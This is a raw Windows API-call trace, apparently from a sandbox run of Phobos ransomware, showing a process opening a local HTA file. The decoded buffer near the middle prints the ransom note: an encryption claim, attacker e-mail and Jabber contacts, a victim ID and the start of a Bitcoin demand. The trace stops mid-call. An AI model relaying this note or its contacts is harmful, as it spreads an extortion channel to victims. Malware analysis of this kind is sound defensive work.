[0226.425] GetCurrentProcessId () returned 0x124 [0226.425] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fe030 | out: hHeap=0x590000) returned 1 [0226.425] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d0a28 | out: hHeap=0x590000) returned 1 [0226.426] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x603dc0 | out: hHeap=0x590000) returned 1 [0226.426] IUnknown:Release (This=0x5bbbac) returned 0xe [0226.426] IUnknown:Release (This=0x5c5628) returned 0x3 [0226.426] IUnknown:Release (This=0x5bbbac) returned 0xd [0226.426] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.426] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.426] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5f84e8 | out: hHeap=0x590000) returned 1 [0226.461] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5f0328 | out: hHeap=0x590000) returned 1 [0226.462] IUnknown:Release (This=0x5bbbac) returned 0xc [0226.462] IUnknown:Release (This=0x5c5628) returned 0x2 [0226.462] IUnknown:Release (This=0x5bbbac) returned 0xb [0226.462] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.462] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.462] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d4c68 | out: hHeap=0x590000) returned 1 [0226.462] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d1a30 | out: hHeap=0x590000) returned 1 [0226.462] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce680 [0226.462] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5fd658 [0226.462] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2000) returned 0x5fdd20 [0226.463] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5ce6d8 [0226.463] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x1ef368 | out: ppURI=0x1ef368*=0x5bb834) returned 0x0 [0226.463] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="about:blank", pdwZone=0x1ef36c, dwFlags=0x0 | out: pdwZone=0x1ef36c*=0xffffffff) returned 0x800c0011 [0226.463] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.463] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.463] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.463] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x1ef370, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x1ef370*=0x0) returned 0x0 [0226.463] IUnknown:Release (This=0x5bb834) returned 0x2 [0226.463] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5ad8c0 [0226.465] CMemStm::Clone () returned 0x0 [0226.471] CBaseMoniker::AddRef () returned 0x2 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5d0ae8 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5d0b18 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5d3bb0 [0226.471] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5dc748 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Read () returned 0x0 [0226.471] CMemStm::Release () returned 0x1 [0226.471] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.471] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/info.hta", ppmk=0x1ef540*=0x0, dwFlags=0x1 | out: ppmk=0x1ef540*=0x5cf780) returned 0x0 [0226.471] GetFocus () returned 0x3016a [0226.471] GetCursorPos (in: lpPoint=0x1ef288 | out: lpPoint=0x1ef288*(x=449, y=50)) returned 1 [0226.471] ScreenToClient (in: hWnd=0x3016a, lpPoint=0x1ef288 | out: lpPoint=0x1ef288) returned 1 [0226.472] GetClientRect (in: hWnd=0x3016a, lpRect=0x1ef278 | out: lpRect=0x1ef278) returned 1 [0226.472] IUnknown:AddRef (This=0x5cf780) returned 0x2 [0226.472] IUnknown:QueryInterface (in: This=0x5cf780, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x1ef2b8 | out: ppvObject=0x1ef2b8*=0x5cf78c) returned 0x0 [0226.472] IUriContainer:GetIUri (in: This=0x5cf78c, ppIUri=0x1ef30c | out: ppIUri=0x1ef30c*=0x5bbf0c) returned 0x0 [0226.472] IUnknown:Release (This=0x5cf78c) returned 0x2 [0226.472] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x604488 [0226.472] IUnknown:AddRef (This=0x5cf780) returned 0x3 [0226.472] IUnknown:AddRef (This=0x5bbf0c) returned 0x7 [0226.472] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef2e4 | out: ppvObject=0x1ef2e4*=0x5bbf0c) returned 0x0 [0226.472] IUnknown:Release (This=0x5bbf0c) returned 0x7 [0226.472] IUnknown:AddRef (This=0x5bbf0c) returned 0x8 [0226.472] IUri:GetScheme (in: This=0x5bbf0c, pdwScheme=0x1ef2dc | out: pdwScheme=0x1ef2dc*=0x9) returned 0x0 [0226.472] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc8) returned 0x5d1a30 [0226.472] GetCurrentProcessId () returned 0x124 [0226.472] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef2e4 | out: ppvObject=0x1ef2e4*=0x5bbf0c) returned 0x0 [0226.472] IUnknown:Release (This=0x5bbf0c) returned 0x8 [0226.472] IUnknown:AddRef (This=0x5bbf0c) returned 0x9 [0226.472] IUri:GetScheme (in: This=0x5bbf0c, pdwScheme=0x1ef2b4 | out: pdwScheme=0x1ef2b4*=0x9) returned 0x0 [0226.472] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef268 | out: ppvObject=0x1ef268*=0x5bbf0c) returned 0x0 [0226.472] IUnknown:Release (This=0x5bbf0c) returned 0x9 [0226.472] IUnknown:AddRef (This=0x5bbf0c) returned 0xa [0226.472] IUnknown:Release (This=0x5bbf0c) returned 0x9 [0226.472] IUri:GetAbsoluteUri (in: This=0x5bbf0c, pbstrAbsoluteUri=0x1ef2e4 | out: pbstrAbsoluteUri=0x1ef2e4*="file:///C:/info.hta") returned 0x0 [0226.472] SysStringLen (param_1="file:///C:/info.hta") returned 0x13 [0226.473] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x1ef300 | out: ppURI=0x1ef300*=0x5bc0bc) returned 0x0 [0226.473] IUnknown:Release (This=0x5bbf0c) returned 0x8 [0226.473] IUri:GetScheme (in: This=0x5bc0bc, pdwScheme=0x1ef294 | out: pdwScheme=0x1ef294*=0x9) returned 0x0 [0226.473] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.473] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0226.473] IUri:GetAbsoluteUri (in: This=0x5bc0bc, pbstrAbsoluteUri=0x604488 | out: pbstrAbsoluteUri=0x604488*="file:///C:/info.hta") returned 0x0 [0226.473] SetTimer (hWnd=0x3016a, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0226.473] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef290 | out: ppu=0x1ef290) returned 0x0 [0226.473] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5ffd40 [0226.603] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5ffd60 [0226.603] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5dc748, Size=0x60) returned 0x5e1ac8 [0226.603] GetCursorPos (in: lpPoint=0x1ef0e0 | out: lpPoint=0x1ef0e0*(x=449, y=50)) returned 1 [0226.603] ScreenToClient (in: hWnd=0x3016a, lpPoint=0x1ef0e0 | out: lpPoint=0x1ef0e0) returned 1 [0226.603] GetKeyState (nVirtKey=16) returned 0 [0226.603] GetKeyState (nVirtKey=17) returned 0 [0226.603] GetKeyState (nVirtKey=18) returned 0 [0226.603] GetKeyState (nVirtKey=160) returned 0 [0226.603] GetKeyState (nVirtKey=162) returned 0 [0226.603] GetKeyState (nVirtKey=164) returned 0 [0226.603] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5d83d8 [0226.604] GetCurrentThreadId () returned 0x36c [0226.604] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d83d8 | out: hHeap=0x590000) returned 1 [0226.604] GetCurrentThreadId () returned 0x36c [0226.604] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d83d8 [0226.604] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef280 | out: ppu=0x1ef280) returned 0x0 [0226.604] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x1ef264 | out: ppURI=0x1ef264*=0x5bbf0c) returned 0x0 [0226.604] IUnknown:AddRef (This=0x5bbf0c) returned 0xa [0226.604] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef204, dwFlags=0x0 | out: pdwZone=0x1ef204*=0xffffffff) returned 0x800c0011 [0226.604] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.604] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.604] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.604] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x2700, pPolicy=0x1ef208, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x1ef208*=0x0) returned 0x0 [0226.604] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.604] IUnknown:Release (This=0x5bbf0c) returned 0x9 [0226.604] IUnknown:Release (This=0x5bbf0c) returned 0x8 [0226.604] IUnknown:AddRef (This=0x5bc0bc) returned 0x4 [0226.604] IUri:GetPropertyDWORD (in: This=0x5bc0bc, uriProp=0x11, pdwProperty=0x1ef03c, dwFlags=0x0 | out: pdwProperty=0x1ef03c*=0x9) returned 0x0 [0226.604] IUnknown:Release (This=0x5bc0bc) returned 0x3 [0226.604] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d8410 [0226.604] IInternetSecurityManager:GetSecurityId (in: This=0x5c35a8, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef098, pcbSecurityId=0x1ef094*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef098*=0x66, pcbSecurityId=0x1ef094*=0x9) returned 0x0 [0226.604] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef098, pcbSecurityId=0x1ef094*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef098*=0x0, pcbSecurityId=0x1ef094*=0x200) returned 0x800c0011 [0226.604] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8410 | out: hHeap=0x590000) returned 1 [0226.604] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.604] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9) returned 0x5fd670 [0226.604] StrCmpICW (pszStr1="file:///C:/info.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0226.604] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef22c | out: ppvObject=0x1ef22c*=0x5bbf0c) returned 0x0 [0226.605] IUnknown:Release (This=0x5bbf0c) returned 0x8 [0226.605] IUnknown:AddRef (This=0x5bbf0c) returned 0x9 [0226.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12c) returned 0x600528 [0226.605] CBaseMoniker::AddRef () returned 0x2 [0226.605] IUnknown:AddRef (This=0x5bbf0c) returned 0xa [0226.605] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef1f0 | out: ppvObject=0x1ef1f0*=0x5bbf0c) returned 0x0 [0226.605] IUnknown:Release (This=0x5bbf0c) returned 0xa [0226.605] IUnknown:AddRef (This=0x5bbf0c) returned 0xb [0226.605] IUnknown:Release (This=0x5bbf0c) returned 0xa [0226.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5dc748 [0226.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x5d1b00 [0226.605] IUri:GetScheme (in: This=0x5bbf0c, pdwScheme=0x1ef274 | out: pdwScheme=0x1ef274*=0x9) returned 0x0 [0226.605] IUri:IsEqual (in: This=0x5bc0bc, pUri=0x5bbf0c, pfEqual=0x1ef2bc | out: pfEqual=0x1ef2bc*=1) returned 0x0 [0226.605] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce6d8 [0226.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5ffd80 [0226.605] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x50) returned 0x5ce730 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5e1b30 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12c) returned 0x600660 [0226.606] IUnknown:AddRef (This=0x5bbf0c) returned 0xb [0226.606] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef210 | out: ppvObject=0x1ef210*=0x5bbf0c) returned 0x0 [0226.606] IUnknown:Release (This=0x5bbf0c) returned 0xb [0226.606] IUnknown:AddRef (This=0x5bbf0c) returned 0xc [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce788 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x68) returned 0x603dc0 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x108) returned 0x600798 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5fd688 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xcc) returned 0x5bcd58 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5fd6a0 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5d8448 [0226.606] IUnknown:AddRef (This=0x5c5628) returned 0x3 [0226.606] IUnknown:AddRef (This=0x5bbf0c) returned 0xd [0226.606] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef1d0 | out: ppvObject=0x1ef1d0*=0x5bbf0c) returned 0x0 [0226.606] IUnknown:Release (This=0x5bbf0c) returned 0xd [0226.606] IUnknown:AddRef (This=0x5bbf0c) returned 0xe [0226.606] IUri:GetScheme (in: This=0x5bbf0c, pdwScheme=0x1ef1d4 | out: pdwScheme=0x1ef1d4*=0x9) returned 0x0 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1006) returned 0x5d4c68 [0226.606] CMemStm::Read () returned 0x0 [0226.606] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce7e0 [0226.607] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x200c) returned 0x5f0328 [0226.607] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2006) returned 0x5f2340 [0226.607] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x5d4c68, cbMultiByte=4096, lpWideCharStr=0x5f2344, cchWideChar=4096 | out: lpWideCharStr="\r\n\r\n \r\n \r\n phobos\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n
    \r\n\x09\x09\r\n\x09\x09
    All your files have been encrypted!
    \r\n\x09
    \r\n
    All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail tedmundboardus@aol.com
    \x09
    Write this ID in the title of your message 9C354B42-0001
    \r\n\x09
    In case of no answer in 24 hours write us to this e-mail:tylecotebenji@aol.com
    \r\n\x09
    If there is no response from our mail, you can install the Jabber client and write to us in support of phobos_helper@xmpp.jp
    \r\n
    \r\n\x09\x09You have to pay for decryption in Bitcoins. The price d") returned 4096 [0226.607] CMemStm::Read () returned 0x0 [0226.608] IUnknown:Release (This=0x5bbf0c) returned 0xd [0226.608] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0226.608] IUnknown:Release (This=0x5cf780) returned 0x2 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d0b18 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] IUnknown:Release (This=0x5bbf0c) returned 0xc [0226.608] IUnknown:Release (This=0x5bbf0c) returned 0xb [0226.608] CMemStm::Release () returned 0x1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d0ae8 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] IUnknown:Release (This=0x5cf780) returned 0x1 [0226.608] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.608] CoTaskMemFree (pv=0x0) [0226.609] IUnknown:AddRef (This=0x5bbf0c) returned 0xc [0226.609] IUri:GetPropertyDWORD (in: This=0x5bbf0c, uriProp=0x11, pdwProperty=0x1eefd4, dwFlags=0x0 | out: pdwProperty=0x1eefd4*=0x9) returned 0x0 [0226.609] IUnknown:Release (This=0x5bbf0c) returned 0xb [0226.609] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d8480 [0226.609] IInternetSecurityManager:GetSecurityId (in: This=0x5c35a8, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef238, pcbSecurityId=0x1ef030*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef238*=0x66, pcbSecurityId=0x1ef030*=0x9) returned 0x0 [0226.609] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef238, pcbSecurityId=0x1ef030*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef238*=0x0, pcbSecurityId=0x1ef030*=0x200) returned 0x800c0011 [0226.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8480 | out: hHeap=0x590000) returned 1 [0226.609] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0226.609] IUri:GetPropertyDWORD (in: This=0x5bc0bc, uriProp=0x11, pdwProperty=0x1eefd4, dwFlags=0x0 | out: pdwProperty=0x1eefd4*=0x9) returned 0x0 [0226.609] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0226.609] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d8480 [0226.609] IInternetSecurityManager:GetSecurityId (in: This=0x5c35a8, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef038, pcbSecurityId=0x1ef034*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef038*=0x66, pcbSecurityId=0x1ef034*=0x9) returned 0x0 [0226.609] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef038, pcbSecurityId=0x1ef034*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef038*=0x0, pcbSecurityId=0x1ef034*=0x200) returned 0x800c0011 [0226.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8480 | out: hHeap=0x590000) returned 1 [0226.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8058 | out: hHeap=0x590000) returned 1 [0226.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d3ef0 | out: hHeap=0x590000) returned 1 [0226.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.609] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.671] IUnknown:Release (This=0x5c35a8) returned 0x0 [0226.671] IUnknown:Release (This=0x5c1d8c) returned 0x0 [0226.671] IUnknown:Release (This=0x744796bc) returned 0x7 [0226.671] IUnknown:AddRef (This=0x5bbf0c) returned 0xc [0226.671] IUri:GetPropertyDWORD (in: This=0x5bbf0c, uriProp=0x11, pdwProperty=0x1ef30c, dwFlags=0x0 | out: pdwProperty=0x1ef30c*=0x9) returned 0x0 [0226.671] IUnknown:Release (This=0x5bbf0c) returned 0xb [0226.671] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x5c1d84, dwReserved=0x0 | out: ppSM=0x5c1d84*=0x5e1b98) returned 0x0 [0226.671] IInternetSecurityManager:SetSecuritySite (This=0x5e1b98, pSite=0x5c1d8c) returned 0x0 [0226.671] IUnknown:AddRef (This=0x5c1d8c) returned 0xc8 [0226.671] IUnknown:QueryInterface (in: This=0x5c1d8c, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x1ed2d4 | out: ppvObject=0x1ed2d4*=0x5c1d90) returned 0x0 [0226.671] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x5e1bc0 | out: ppvObject=0x5e1bc0*=0x0) returned 0x80004002 [0226.671] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x5e1bbc | out: ppvObject=0x5e1bbc*=0x0) returned 0x80004002 [0226.671] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5e1bb8 | out: ppvObject=0x5e1bb8*=0x744796bc) returned 0x0 [0226.672] IUnknown:Release (This=0x5c1d90) returned 0x0 [0226.672] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d8058 [0226.672] IInternetSecurityManager:GetSecurityId (in: This=0x5e1b98, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef368, pcbSecurityId=0x1ef364*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef368*=0x66, pcbSecurityId=0x1ef364*=0x9) returned 0x0 [0226.672] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef368, pcbSecurityId=0x1ef364*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef368*=0x0, pcbSecurityId=0x1ef364*=0x200) returned 0x800c0011 [0226.672] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d8058 | out: hHeap=0x590000) returned 1 [0226.672] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0226.672] IUri:GetPropertyDWORD (in: This=0x5bc0bc, uriProp=0x11, pdwProperty=0x1ef0dc, dwFlags=0x0 | out: pdwProperty=0x1ef0dc*=0x9) returned 0x0 [0226.672] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0226.672] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5d8058 [0226.672] IInternetSecurityManager:GetSecurityId (in: 